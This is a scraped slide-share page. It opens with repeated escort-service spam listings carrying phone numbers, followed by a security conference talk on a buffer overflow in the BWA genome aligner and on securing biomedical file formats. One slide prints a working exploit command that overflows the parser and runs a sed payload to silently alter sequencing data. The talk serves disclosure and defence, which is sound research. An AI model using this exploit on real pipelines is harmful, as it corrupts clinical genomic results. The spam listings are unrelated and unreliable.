visakhapatnam Call Girls 👙 6297143586 👙 Genuine WhatsApp Number for Real Meetvisakhapatnam Call Girls 👙 6297143586 👙 Genuine WhatsApp Number for Real Meet
visakhapatnam Call Girls 👙 6297143586 👙 Genuine WhatsApp Number for Real Meet
 
Call Girls Service Mohali {7435815124} ❤️VVIP PALAK Call Girl in Mohali Punjab
Call Girls Service Mohali {7435815124} ❤️VVIP PALAK Call Girl in Mohali PunjabCall Girls Service Mohali {7435815124} ❤️VVIP PALAK Call Girl in Mohali Punjab
Call Girls Service Mohali {7435815124} ❤️VVIP PALAK Call Girl in Mohali Punjab
 
Call Now ☎ 8868886958 || Call Girls in Chandigarh Escort Service Chandigarh
Call Now ☎ 8868886958 || Call Girls in Chandigarh Escort Service ChandigarhCall Now ☎ 8868886958 || Call Girls in Chandigarh Escort Service Chandigarh
Call Now ☎ 8868886958 || Call Girls in Chandigarh Escort Service Chandigarh
 
vadodara Call Girls 👙 6297143586 👙 Genuine WhatsApp Number for Real Meet
vadodara Call Girls 👙 6297143586 👙 Genuine WhatsApp Number for Real Meetvadodara Call Girls 👙 6297143586 👙 Genuine WhatsApp Number for Real Meet
vadodara Call Girls 👙 6297143586 👙 Genuine WhatsApp Number for Real Meet
 
Escorts Service Ahmedabad🌹6367187148 🌹 No Need For Advance Payments
Escorts Service Ahmedabad🌹6367187148 🌹 No Need For Advance PaymentsEscorts Service Ahmedabad🌹6367187148 🌹 No Need For Advance Payments
Escorts Service Ahmedabad🌹6367187148 🌹 No Need For Advance Payments
 
Jaipur Call Girls 9257276172 Call Girl in Jaipur Rajasthan
Jaipur Call Girls 9257276172 Call Girl in Jaipur RajasthanJaipur Call Girls 9257276172 Call Girl in Jaipur Rajasthan
Jaipur Call Girls 9257276172 Call Girl in Jaipur Rajasthan
 
Indore Call Girl Service 📞9235973566📞Just Call Inaaya📲 Call Girls In Indore N...
Indore Call Girl Service 📞9235973566📞Just Call Inaaya📲 Call Girls In Indore N...Indore Call Girl Service 📞9235973566📞Just Call Inaaya📲 Call Girls In Indore N...
Indore Call Girl Service 📞9235973566📞Just Call Inaaya📲 Call Girls In Indore N...
 
Low Rate Call Girls Pune {9xx000xx09} ❤️VVIP NISHA Call Girls in Pune Maharas...
Low Rate Call Girls Pune {9xx000xx09} ❤️VVIP NISHA Call Girls in Pune Maharas...Low Rate Call Girls Pune {9xx000xx09} ❤️VVIP NISHA Call Girls in Pune Maharas...
Low Rate Call Girls Pune {9xx000xx09} ❤️VVIP NISHA Call Girls in Pune Maharas...
 
9316020077📞Majorda Beach Call Girls Numbers, Call Girls Whatsapp Numbers Ma...
9316020077📞Majorda Beach Call Girls  Numbers, Call Girls  Whatsapp Numbers Ma...9316020077📞Majorda Beach Call Girls  Numbers, Call Girls  Whatsapp Numbers Ma...
9316020077📞Majorda Beach Call Girls Numbers, Call Girls Whatsapp Numbers Ma...
 
👉Bangalore Call Girl Service👉📞 7304373326 👉📞 Just📲 Call Rajveer Call Girls Se...
👉Bangalore Call Girl Service👉📞 7304373326 👉📞 Just📲 Call Rajveer Call Girls Se...👉Bangalore Call Girl Service👉📞 7304373326 👉📞 Just📲 Call Rajveer Call Girls Se...
👉Bangalore Call Girl Service👉📞 7304373326 👉📞 Just📲 Call Rajveer Call Girls Se...
 
Gorgeous Call Girls In Pune {9xx000xx09} ❤️VVIP ANKITA Call Girl in Pune Maha...
Gorgeous Call Girls In Pune {9xx000xx09} ❤️VVIP ANKITA Call Girl in Pune Maha...Gorgeous Call Girls In Pune {9xx000xx09} ❤️VVIP ANKITA Call Girl in Pune Maha...
Gorgeous Call Girls In Pune {9xx000xx09} ❤️VVIP ANKITA Call Girl in Pune Maha...
 
Sexy Call Girl Tiruvannamalai Arshi 💚9058824046💚 Tiruvannamalai Escort Service
Sexy Call Girl Tiruvannamalai Arshi 💚9058824046💚 Tiruvannamalai Escort ServiceSexy Call Girl Tiruvannamalai Arshi 💚9058824046💚 Tiruvannamalai Escort Service
Sexy Call Girl Tiruvannamalai Arshi 💚9058824046💚 Tiruvannamalai Escort Service
 

From Buffer-Overflowing Genomic Tools to Securing Biomedical File Formats

  • 1. From Buffer-Overflowing Genomic Tools to Securing Biomedical File Formats Corey M. Hudson Charles Fracchia
  • 2. Corey’s Funding Supported by the Laboratory Directed Research and Development program at Sandia National Laboratories, a multi-mission laboratory managed and operated by National Technology and Engineering Solutions of Sandia, LLC, a wholly owned subsidiary of Honeywell International, Inc., for the U.S. Department of Energy’s National Nuclear Security Administration under contract DE-NA0003525.
  • 3. What is a Genome’s value? NHGRI Data (2019) Illumina (2018) NHGRI Estimate (2011) $1,000
  • 4. Growth Drivers: Healthcare and Genomics Athreya et al., 2019
  • 6. What issues has this growth created? BROAD Institute Best-Practices Pipeline ARPANET (1971) Change in trust model Need for standardization & automation
  • 7. Bio is turning Digital ObservationSubject Selection Analysis manual manual manual
  • 8. Bio is turning Digital automated automated automated ObservationSubject Selection Analysis
  • 9. The Bio-Digital “Stack” Design Build Test Analyze digital input output
  • 10. The Bio-Digital “Stack” Design Build Test Analyze digital input output
  • 11. Critical Workflows rely on digital tools
  • 12. Critical Workflows rely on digital tools Then?
  • 13. Where do these tools come from? Academia Business
  • 14. Where do these tools come from? Academia Business .NET Bio AMPHORA Anduril Ascalaph Designer AutoDock Avogadro Bioclipse Bioconductor BioJava BioJS BioMOBY BioPerl https://en.wikipedia.org/wiki/List_of_open-source_bioinformatics_software BioPHP Biopython BioRuby CP2K EMBOSS Galaxy GenePattern Geworkbench GMOD GenGIS Genomespace GENtle GROMACS IntGenomeBrows InterMine LabKey Server LAMMPS mothur PathVisio Orange Staden Package Taverna workbench UGENE Unipept VOTCA
  • 15. Just alignment software! Academia Business BLAST CS-BLAST CUDASW++ DIAMOND FASTA GGSEARCH, GLSEARCH Genoogle HMMER HH-suite IDF Infernal KLAST LAMBDA MMseqs2 USEARCH OSWALD parasail PSI-BLAST PSI-Search ScalaBLAST Sequilab SAM SSEARCH SWAPHI SWAPHI-LS SWIMM SWIPE ACANA AlignMe ALLALIGN Bioconductor BioPerl dpAlign BLASTZ, LASTZ CUDAlign DNADot DNASTAR DOTLET FEAST Genome Compiler G-PAS GapMis GGSEARCH, GLSEARCH JAligner K*Sync LALIGN NW-align mAlign matcher MCALIGN2 MUMmer needle Ngila NW parasail Path PatternHunter https://en.wikipedia.org/wiki/List_of_open-source_bioinformatics_software ProbA PyMOL REPuter SABERTOOTH Satsuma SEQALN SIM, GAP, NAP, LAP SIM SPA: Super pairwise alignment SSEARCH Sequences Studio SWIFT suit stretcher tranalign UGENE water wordmatch YASS ABA ALE ALLALIGN AMAP BAli-Phy Base-By-Base CHAOS, DIALIGN ClustalW CodonCode Aligner Compass DECIPHER DIALIGN-TX DNA Alignment DNA DNADynamo DNASTAR EDNA FAMSA FSA Geneious Kalign MAFFT MARNA MAVID MSA MSAProbs MULTALIN Multi-LAGAN MUSCLE Opal Pecan Phylo PMFastR Praline PicXAA POA Probalign ProbCons PROMALS3D PRRN/PRRP PSAlign RevTrans SAGA SAM Se-Al StatAlign Stemloc T-Coffee UGENE VectorFriends GLProbs ACT AVID BLAT DECIPHER FLAK GMAP Splign Mauve MGA Mulan Multiz PLAST-ncRNA Sequerome Sequilab Shuffle-LAGAN SIBsim4, Sim4 SLAM PMS FMM BLOCKS eMOTIF Gibbs motif sampler HMMTOP I-sites JCoils MEME/MAST CUDA-MEME MERCI PHI-Blast Phyloscan PRATT ScanProsite TEIRESIAS BASALT Arioc BarraCUDA BBMap BFAST BigBWA BLASTN BLAT Bowtie BWA BWA-PSSM CASHX Cloudburst CUDA-EC CUSHAW CUSHAW2 CUSHAW2-GPU CUSHAW3 drFAST ELAND ERNE GASSST GEM Genalice MAP Geneious Assembler GensearchNGS GMAP GNUMAP HIVE-hexagon IMOS LAST MAQ mrFAST MOM MOSAIK MPscan Novoalign NextGENe NextGenMap Omixon Variant Toolkit PALMapper Partek Flow PASS PerM PRIMEX QPalma RazerS REAL RMAP rNA RTG Investigator Segemehl SeqMap Shrec SHRiMP SLIDER SOAP SOCS SparkBWA SSAHA, SSAHA2 Stampy SToRM Taipan UGENE VelociMapper XpressAlign ZOOM
  • 16. Where do these tools come from? Academia Business Instrument Software Electronic Lab Notebooks SpotFire Geneious FlowJo PEAKS IPA LaserGene Geneious SnapGene Gene Construction Kit Sequencher CodonCode Aligner Ingenuity Pathway Analysis GeneSpring JMP Genomics Genevestigator GeneMarker PeakScanner GenomeStudio Analyst Metamorph Volocity Avizo MicroView FCS Express
  • 17. Just alignment software! Academia Business BLAST CS-BLAST CUDASW++ DIAMOND FASTA GGSEARCH, GLSEARCH Genoogle HMMER HH-suite IDF Infernal KLAST LAMBDA MMseqs2 USEARCH OSWALD parasail PSI-BLAST PSI-Search ScalaBLAST Sequilab SAM SSEARCH SWAPHI SWAPHI-LS SWIMM SWIPE ACANA AlignMe ALLALIGN Bioconductor BioPerl dpAlign BLASTZ, LASTZ CUDAlign DNADot DNASTAR DOTLET FEAST Genome Compiler G-PAS GapMis GGSEARCH, GLSEARCH JAligner K*Sync LALIGN NW-align mAlign matcher MCALIGN2 MUMmer needle Ngila NW parasail Path PatternHunter https://en.wikipedia.org/wiki/List_of_open-source_bioinformatics_software ProbA PyMOL REPuter SABERTOOTH Satsuma SEQALN SIM, GAP, NAP, LAP SIM SPA: Super pairwise alignment SSEARCH Sequences Studio SWIFT suit stretcher tranalign UGENE water wordmatch YASS ABA ALE ALLALIGN AMAP BAli-Phy Base-By-Base CHAOS, DIALIGN ClustalW CodonCode Aligner Compass DECIPHER DIALIGN-TX DNA Alignment DNA DNADynamo DNASTAR EDNA FAMSA FSA Geneious Kalign MAFFT MARNA MAVID MSA MSAProbs MULTALIN Multi-LAGAN MUSCLE Opal Pecan Phylo PMFastR Praline PicXAA POA Probalign ProbCons PROMALS3D PRRN/PRRP PSAlign RevTrans SAGA SAM Se-Al StatAlign Stemloc T-Coffee UGENE VectorFriends GLProbs ACT AVID BLAT DECIPHER FLAK GMAP Splign Mauve MGA Mulan Multiz PLAST-ncRNA Sequerome Sequilab Shuffle-LAGAN SIBsim4, Sim4 SLAM PMS FMM BLOCKS eMOTIF Gibbs motif sampler HMMTOP I-sites JCoils MEME/MAST CUDA-MEME MERCI PHI-Blast Phyloscan PRATT ScanProsite TEIRESIAS BASALT Arioc BarraCUDA BBMap BFAST BigBWA BLASTN BLAT Bowtie BWABWA-PSSM CASHX Cloudburst CUDA-EC CUSHAW CUSHAW2 CUSHAW2-GPU CUSHAW3 drFAST ELAND ERNE GASSST GEM Genalice MAP Geneious Assembler GensearchNGS GMAP GNUMAP HIVE-hexagon IMOS LAST MAQ mrFAST MOM MOSAIK MPscan Novoalign NextGENe NextGenMap Omixon Variant Toolkit PALMapper Partek Flow PASS PerM PRIMEX QPalma RazerS REAL RMAP rNA RTG Investigator Segemehl SeqMap Shrec SHRiMP SLIDER SOAP SOCS SparkBWA SSAHA, SSAHA2 Stampy SToRM Taipan UGENE VelociMapper XpressAlign ZOOM
  • 18. Genomics Data: A Primer Data Flows Data Pipelines
  • 19. Hacking the Raw Data to Change a Clinical Outcome
  • 21. First tool in the pipeline - BWA 1. BWA takes FASTQ files as input and maps these to a reference genome, creating a SAM file 2. In 2014, BWA developers added the ALT-aware capacity – which allowed users to map reads to a population, rather than canonical single reference 3. Since the population is always changing and requires up-to-date knowledge, the reference is hosted at a central repository 4. BWA provides a tool – bwa.kit, which accesses this data from the US National Center for Biotechnology Information (NCBI), which has provided resources for the storage and delivery of these files as a tarred and gzipped directory of indices: ftp://ftp.ncbi.nlm.nih.gov/genomes/all/GCA/000/001/405/GCA_000001405.15_GRCh38/seqs_f or_alignment_pipelines.ucsc_ids/ 5. The user then unzips and stores the indices provided by NCBI 6. A .alt file is used to index the genome and make it alt-aware
  • 22. BWA and the Outside World
  • 23. A Native BWA Vulnerability If a .alt file has a line >1024 bytes it will overflow here 1024 byte buffer
  • 25. Database indices are delivered unencrypted over FTP FTP Protocol {No Checksums
  • 27. Crafting an exploit After the data are mapped – turn a single A at a particular position in the genome into a C. Limits No other data in the genome can be harmed (can’t turn all A’s to C’s) Must change raw data (make it invisible in follow- on analysis)
  • 28. How to target the position – PCR trick Running Polymerase Chain Reaction (PCR) requires primers If you wish to find a particular nucleotide in the genome, you need primers up and downstream of the nucleotide of interest Chose A at position 64,544,989 on chromosome 12 Random choice (not clinically meaningful) 7 base pairs upstream and 9 base pairs downstream are sufficient to be nearly unique
  • 29. Full exploit delivered with over MitM python -c "print '@' + 'A'*1500 + 'B'*1500 + 'C'*1500 + 'D'*419 + '/bin/bash -c “sed -i s/C.CAGA.AGCTAATGG./CACAGAACGCTAATGGG/g *.fq”’ ; mv .hiddenAltOrig "GCA_000001405.15_GRCh38_full_analysis_set.fna.alt"; cat ~/.bash_history | grep "bwa mem" | tail -n 1 | /bin/bash > GCA_000001405.15_GRCh38_full_analysis_set.fna.alt Exploit only runs once, but changes all .fq files
  • 31. Three experiments Setup: 3 sets of simulated reads in data directory – finalizing as simulated_reads{A,B,C}.vcf 1. Unpatched – no exploit 2. Unpatched – Payload: sed -i s/C.CAGA.AGCTAATGG./CACAGAACGCTAATGGG/g 3. Patched – Payload
  • 32. Output of no exploit Reference: Genotype AA at chromosome 12 position 64544989, position 64544989 absent from variants or A
  • 33. Output of PayloadA – AC one-direction Reference: Genotype AA at chromosome 12 position 64544989 – output Genotype AC Probability that Genotype is AC vs random: P<2200.6, P<2121.6, P<2117.6
  • 35. The Bio-Digital “Stack” Design Build Test Analyze digital input output
  • 36. Instrument List (excerpt) Sequencer Mass Spectrometer Chromatographer Blood Gas Analyzer Bioreactor Filtration Machine Cell Counter Syringe Pumps Centrifuges Incubators Electrophoresis Gel Imagers Microarray Blood Culture Robotic Liquid Handlers Electroporators Microscopes Scales Freezers / Fridges Flow Cytometers Digital Pathology High Content Imagers Thermocyclers
  • 37. Instrument List (excerpt) Sequencer Mass Spectrometer Chromatographer Blood Gas Analyzer Bioreactor Filtration Machine Cell Counter Syringe Pumps Centrifuges Incubators Electrophoresis Gel Imagers Microarray Blood Culture Robotic Liquid Handlers Electroporators Microscopes Scales Freezers / Fridges Flow Cytometers Digital Pathology High Content Imagers Thermocyclers digital input
  • 38. Instrument List (excerpt) Sequencer Mass Spectrometer Chromatographer Blood Gas Analyzer Bioreactor Filtration Machine Cell Counter Syringe Pumps Centrifuges Incubators Electrophoresis Gel Imagers Microarray Blood Culture Robotic Liquid Handlers Electroporators Microscopes Scales Freezers / Fridges Flow Cytometers Digital Pathology High Content Imagers Thermocyclers digital output
  • 39. The Bio-Digital “Stack” Design Build Test Analyze digital input output firmware & OS software & file formats firmware & OS software & file formats
  • 40. Vulnerability Landscape software buffer overflows, file corruption, etc firmware file formats OS privilege escalation, remote code execution biological DoS, financial attack …
  • 41. Vulnerability Landscape OS Windows XP HAS to be connected & using SMBv1
  • 42. Vulnerability Landscape OS Windows XP HAS to be connected & using SMBv1
  • 43. A unique constraint of CyberBioSec Scientist vs IT
  • 44. What needs to happen, starting now 1. Hardened parsers for common formats 2. Bug bounties for key software 3. Instrument manufacturers should publish file format specs & parser code
  • 45. Asks Wanna fund bug bounties? Come talk to us Instrument Vendors, come talk to us Send us sample files! https://bit.ly/2yxzy8I
  • 46. From Buffer-Overflowing Genomic Tools to Securing Biomedical File Formats Corey M. Hudson Charles Fracchia

Notas del editor

  1. Thoughts on overall structure: Intro of who we are & disclaimer on Sandia funding Genome’s value & pressure created by this growth This has led to a total dependence on digital tools: biomedical research has now reached a stage where digital tools are ubiquitous and cannot be removed HOWEVER, these tools primarily come from Academia, are poorly supported, often BOTH. Show disparity with ”industrial tools”, talk about what BB sees in the field: companies having to build their own tooling, often cobbled together from open source tools, and VERY little-to-no sensitivity and expertise in infosec End with the long list of open source ALIGNMENT software, highlight BWA [SEGWAY for Corey] Talk about vulnerability and context, chained attack vector and result! PAUSE for effect  Return to diagram of fully automated biomed near-future and show how each link in the chain can be a vector of attack. Link to the wider problem Show list of instrumentation that we often see in labs and outline the ones with INPUTS and OUTPUTS Explain how large volumes of data (OUTPUTS) further increase reliance on digital tools and how integrity is key Hint at the project to identify and patch vulnerabilities in bio file formats Ask for people to contribute expertise & sample file formats
  2. Since the birth of modern biomedicine as an observable science in the 16th century, biomedicine has been dominated by manual processes However, we are now at a crucial inflection point for the field thanks to automation and digital tools finally becoming available
  3. Critical Workflows rely on digital tools Kiestra TLA on left – from Automation in Clinical Microbiology in ASM Journal of Clinical Microbiology https://doi.org/10.1128/JCM.00301-13 BROAD Somatic Cell Line Pipeline on right
  4. Critical Workflows rely on digital tools Kiestra TLA on left – from Automation in Clinical Microbiology in ASM Journal of Clinical Microbiology https://doi.org/10.1128/JCM.00301-13 BROAD Somatic Cell Line Pipeline on right
  5. Imagine if your LIQUID HANDLER goes down SEQUENCER IMAGER ELECTRONIC LAB NOTEBOOK
  6. Imagine if your LIQUID HANDLER goes down SEQUENCER IMAGER ELECTRONIC LAB NOTEBOOK
  7. Critical Workflows rely on digital tools
  8. Thoughts on overall structure: Intro of who we are & disclaimer on Sandia funding Genome’s value & pressure created by this growth This has led to a total dependence on digital tools: biomedical research has now reached a stage where digital tools are ubiquitous and cannot be removed HOWEVER, these tools primarily come from Academia, are poorly supported, often BOTH. Show disparity with ”industrial tools”, talk about what BB sees in the field: companies having to build their own tooling, often cobbled together from open source tools, and VERY little-to-no sensitivity and expertise in infosec End with the long list of open source ALIGNMENT software, highlight BWA [SEGWAY for Corey] Talk about vulnerability and context, chained attack vector and result! PAUSE for effect  Return to diagram of fully automated biomed near-future and show how each link in the chain can be a vector of attack. Link to the wider problem Show list of instrumentation that we often see in labs and outline the ones with INPUTS and OUTPUTS Explain how large volumes of data (OUTPUTS) further increase reliance on digital tools and how integrity is key Hint at the project to identify and patch vulnerabilities in bio file formats Ask for people to contribute expertise & sample file formats